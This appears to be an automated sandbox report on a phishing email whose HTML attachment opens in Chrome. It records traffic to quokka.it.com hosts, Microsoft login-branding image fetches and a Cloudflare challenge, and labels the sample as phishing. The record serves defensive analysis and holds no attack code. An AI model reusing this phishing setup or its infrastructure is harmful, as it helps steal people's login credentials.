            Source: global trafficHTTP traffic detected: GET /bootstrap/4.0.0/js/bootstrap.min.js HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-aliveOrigin: https://newtargetonline.quokka.it.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://newtargetonline.quokka.it.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /jquery-3.2.1.slim.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveOrigin: https://newtargetonline.quokka.it.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://newtargetonline.quokka.it.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /bootstrap.min.js HTTP/1.1Host: 5660942597-1317754460.cos.ap-tokyo.myqcloud.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://newtargetonline.quokka.it.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /logos/assets/PNG/Microsoft_Logo_512px.png HTTP/1.1Host: mailmeteor.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://newtargetonline.quokka.it.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /logos/assets/PNG/Microsoft_Logo_512px.png HTTP/1.1Host: mailmeteor.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /google.php HTTP/1.1Host: ulgf.quokka.it.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://newtargetonline.quokka.it.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /google.php HTTP/1.1Host: ulgf.quokka.it.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /dbd5a2dd-r9ee2fceu6-sxsz-brr5xpw9gxgamr3hr-nzriytzde/logintenantbranding/0/illustration?ts=638352396502877873 HTTP/1.1Host: aadcdn.msauthimages.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://newtargetonline.quokka.it.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /dbd5a2dd-r9ee2fceu6-sxsz-brr5xpw9gxgamr3hr-nzriytzde/logintenantbranding/0/bannerlogo?ts=637363974368856445 HTTP/1.1Host: aadcdn.msauthimages.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://newtargetonline.quokka.it.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /dbd5a2dd-r9ee2fceu6-sxsz-brr5xpw9gxgamr3hr-nzriytzde/logintenantbranding/0/bannerlogo?ts=637363974368856445 HTTP/1.1Host: aadcdn.msauthimages.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /dbd5a2dd-r9ee2fceu6-sxsz-brr5xpw9gxgamr3hr-nzriytzde/logintenantbranding/0/illustration?ts=638352396502877873 HTTP/1.1Host: aadcdn.msauthimages.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /google.php HTTP/1.1Host: ulgf.quokka.it.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /google.php HTTP/1.1Host: ulgf.quokka.it.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficDNS traffic detected: DNS query: newtargetonline.quokka.it.com
            Source: global trafficDNS traffic detected: DNS query: www.google.com
            Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
            Source: global trafficDNS traffic detected: DNS query: cdn.jsdelivr.net
            Source: global trafficDNS traffic detected: DNS query: code.jquery.com
            Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
            Source: global trafficDNS traffic detected: DNS query: maxcdn.bootstrapcdn.com
            Source: global trafficDNS traffic detected: DNS query: stackpath.bootstrapcdn.com
            Source: global trafficDNS traffic detected: DNS query: 5660942597-1317754460.cos.ap-tokyo.myqcloud.com
            Source: global trafficDNS traffic detected: DNS query: ulgf.quokka.it.com
            Source: global trafficDNS traffic detected: DNS query: mailmeteor.com
            Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
            Source: global trafficDNS traffic detected: DNS query: aadcdn.msauthimages.net
            Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/b/flow/ov1/837857943:1742840853:Tz3YFU085wYaInkrE9KujTlEpb5s9JaahUyc1oiNeEQ/92587e487fd0a0f4/Uq_eX371_Tp1QfK.pYf9epUjwAJIrwT7DZyGMyKqkOE-1742843685-1.1.1.1-chVtUcNlysHYSnb9Ad60cIgsSQHyP9rubGfq2HGdGplOXYR28buvBtzjbutCj5oT HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3622sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Content-Type: text/plain;charset=UTF-8cf-chl: Uq_eX371_Tp1QfK.pYf9epUjwAJIrwT7DZyGMyKqkOE-1742843685-1.1.1.1-chVtUcNlysHYSnb9Ad60cIgsSQHyP9rubGfq2HGdGplOXYR28buvBtzjbutCj5oTcf-chl-ra: 0sec-ch-ua-mobile: ?0Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/1fzst/0x4AAAAAABAEUlzWaSj0Ip4v/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Length: 53Access-Control-Allow-Origin: *Access-Control-Expose-Headers: *Timing-Allow-Origin: *Cache-Control: public, max-age=600, s-maxage=600Cross-Origin-Resource-Policy: cross-originX-Content-Type-Options: nosniffStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadContent-Type: text/plain; charset=utf-8ETag: W/"35-Su9w8wyWNKnBnB1glhnyKiBNAH4"Accept-Ranges: bytesAge: 185Date: Mon, 24 Mar 2025 19:14:44 GMTX-Served-By: cache-fra-etou8220171-FRA, cache-lga21928-LGAX-Cache: MISS, HITVary: Accept-Encodingalt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
            Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
            Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
            Source: unknownNetwork traffic detected: HTTP traffic on port 49679 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
            Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
            Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
            Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
            Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
            Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
            Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49673
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
            Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
            Source: unknownHTTPS traffic detected: 104.21.88.169:443 -> 192.168.2.16:49705 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.251.40.196:443 -> 192.168.2.16:49715 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.88.169:443 -> 192.168.2.16:49724 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.129.229:443 -> 192.168.2.16:49729 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.18.94.41:443 -> 192.168.2.16:49728 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.18.94.41:443 -> 192.168.2.16:49734 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.16:49746 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.18.10.207:443 -> 192.168.2.16:49749 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.18.11.207:443 -> 192.168.2.16:49747 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.130.137:443 -> 192.168.2.16:49745 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 43.128.240.48:443 -> 192.168.2.16:49750 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.92.58:443 -> 192.168.2.16:49751 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.88.169:443 -> 192.168.2.16:49752 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.92.58:443 -> 192.168.2.16:49753 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.88.169:443 -> 192.168.2.16:49754 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.209.72.31:443 -> 192.168.2.16:49756 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.216.132.21:443 -> 192.168.2.16:49760 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.216.132.28:443 -> 192.168.2.16:49765 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.216.132.28:443 -> 192.168.2.16:49764 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.209.72.31:443 -> 192.168.2.16:49766 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.151.109:443 -> 192.168.2.16:49772 version: TLS 1.2
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir7112_163257052
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir7112_163257052
            Source: classification engineClassification label: mal72.phis.winEML@26/19@40/244
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmp
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20250324T1514160453-6284.etl
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile read: C:\Users\desktop.ini
            Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\702cb6e..eml"
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "95CF000C-774A-4100-AFA3-63A627741D63" "6C749FAE-6490-4EDE-8477-E3504078F85F" "6284" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\3Z35P0VG\Firstontario00990938376360__098.html
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1984,i,12309989331383670353,2170291733396503276,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2080 /prefetch:3
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "95CF000C-774A-4100-AFA3-63A627741D63" "6C749FAE-6490-4EDE-8477-E3504078F85F" "6284" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\3Z35P0VG\Firstontario00990938376360__098.html
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1984,i,12309989331383670353,2170291733396503276,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2080 /prefetch:3
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: apphelp.dll
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: c2r64.dll
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: userenv.dll
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: msasn1.dll
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: kernel.appcore.dll
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptsp.dll
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: rsaenh.dll
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptbase.dll
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: gpapi.dll
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{F959DBBB-3867-41F2-8E5F-3B8BEFAA81B3}\InprocServer32
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEWindow found: window name: SysTabControl32
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{2B379600-B42B-4FE9-A59C-A312FB934935} DeviceTicket
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
